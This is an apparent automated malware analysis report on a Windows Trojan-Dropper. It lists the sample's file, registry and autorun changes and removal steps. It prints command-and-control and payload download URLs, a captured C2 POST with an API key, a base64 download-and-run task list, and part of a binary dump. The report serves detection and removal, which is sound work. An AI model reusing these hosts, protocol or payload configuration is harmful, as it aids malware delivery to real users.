MD5: 9df56d9a611e40ca1e0651661154a485
SHA1: 53fe1545a339ef737a881228fbc5685784f2a809
SHA256: 7d48e9cb8969bdf371004122d8b2c74f2785b6d52a009d1d4cf1fc0dde76c027
SSDeep: 3072:1T0ybbLTMpQtuKKyQT2HK4rO1HdoRNZsayWcpelNxvrhdODvIACMJ9VGseQw8 8A: IbLT91KyQhgNZcpG7vrhdOzHFeQRZo
Size: 257536 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-09-10 18:17:08
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Sho9libi.exe:3104
%original file name%.exe:2180

The Trojan injects its code into the following process(es):

%original file name%.exe:3436

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Sho9libi.exe:3104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)

The process %original file name%.exe:3436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe (254033 bytes)
C:\config.conf (47 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\SecondL.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\OneTwo.exe (0 bytes)

Registry activity

The process Sho9libi.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process %original file name%.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASMANCS]
"MaxFileSize" = "1048576"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_7FAYT" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: GY%U6T
Product Name: GY%U6TDT
Product Version: 1.3.6.0
Legal Copyright: Copyright (c) 6196
Legal Trademarks:
Original Filename: OAs.exe
Internal Name: OAs.exe
File Version: 1.3.6.0
File Description: GY
Comments: GY%U6T
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://thegrandemanager.com/remotes_xml_sections.php	91.121.29.41
hxxp://lamarinadedownload.com/exe/updater.exe	46.105.121.115
agent.wizztrakys.com	176.31.115.114
dns.msftncsi.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /exe/updater.exe HTTP/1.1

Host: lamarinadedownload.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2017 13:21:25 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="updater.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
24c800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Y.........."...0...!.........J)!.. ...@!...@.. ................
....... %...........@..................................(!.O....@!.....
..................%......'!...........................................
... ............... ..H............text...P.!.. ....!.................
 ..`.rsrc........@!.......!.............@..@.reloc........%.......$...
..........@..B................,)!.....H.......L"..T............1.. . .
........................................6.(.....(....*...0..........(.
...(.....~....(.....~....(.....(......o........io.....(.....o....(....
(........o....r...po.......o....t%..........%...o....&..&..*..........
.......0..3.......(....~....o......s ...%o!.....o"...o#.......&.....*.
........,,.......0..........s$......&.....*.................z.,..{....
,..{....o%.....(&...*z.s'...}......((....r...po)...*..(....*~r#..p....
.re..p.....r...p.....*..(*...*.~....-.r...p.....( ...o,...s-........~.
...*.~....*.......*.~....*..(....*Vs....(/...t.........*..BSJB........
....v2.0.50727......l.......#~......l...#Strings............#US.......
..#GUID.......`...#Blob...........W..........3......../...............
..../...................................................[.............
....w...........>.................{.......................M........
...........b...Q.....(...........n.................[.....r.....2......
.=...=.......b.....b.......................................I.....2
<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: thegrandemanager.com

Content-Length: 169

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2017 13:20:51 GMT

Server: Apache

Set-Cookie: PHPSESSID=nmj80314lcqih6qc0un93st7g3; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 1636

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vbGFtYXJpbmFkZWRvd25sb2Fk
LmNvbS9mcm9tX2JhY2t1cC83NDc0NzQvQWRzU2hvd19pbnN0YWxsZXIuZXhlIiB2ZXJzaW
9uPSIiICBzb2Z0d2FyZT0iIiBuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0
IiBuYW1lPSJTZWNvbmRMIiB2YWx1ZT0ibm90d2FpdCIgcGFyYW1zPSJuaW1wb3J0ZSIvPg
0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IlFzT25lIiB2YWx1ZT0iMTcwOTE4Ii8 DQoNCjwv
cGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9Il
FzT25lIiB2YWx1ZT0iNDUxNzA5MTgiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlv
bnM DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iT2
5lVHdvIiB2YWx1ZT0iaHR0cDovL2xhbWFyaW5hZGVkb3dubG9hZC5jb20vMy8wMDAwMDAv
d2l6emNhc3Rlcl9pbnN0YWxsZXJfdjIuZXhlIiB2ZXJzaW9uPSIiICBzb2Z0d2FyZT0iIi
BuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0IiBuYW1lPSJPbmVUd28iIHZh
bHVlPSJub3R3YWl0IiBwYXJhbXM9IjU3YTc2NGQwNDJiZjgiLz4NCjxtb2QgdHlwZT0iYW
RkIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMDAwMTcwOTE4Ii8 DQoNCjwvcGVyZm9ybT4NCg0K
PGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkhhaGEiIHZhbHVlPS
IxNzA5MTgiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlvbnM DQo8L3Rhc2s PHRh
c2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iU2hvOWxpYmkiIHZhbHVlPS
JodHRwOi8vbGFtYXJpbmFkZWRvd25sb2FkLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNp
b249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3Rhcn
QiIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0
eXBlPSJhZGQiIG5hbWU9IkRhdGUiIHZhbHVlPSJmZThmMTcwOTE4Ii8 DQoNCjwvcGVyZm
9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRh
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   Sho9libi.exe:3104
   %original file name%.exe:2180
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
   C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe.config (1 bytes)
   C:\config.conf (47 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
   "OMEWPRODUCT_7FAYT" = "C:\%original file name%.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.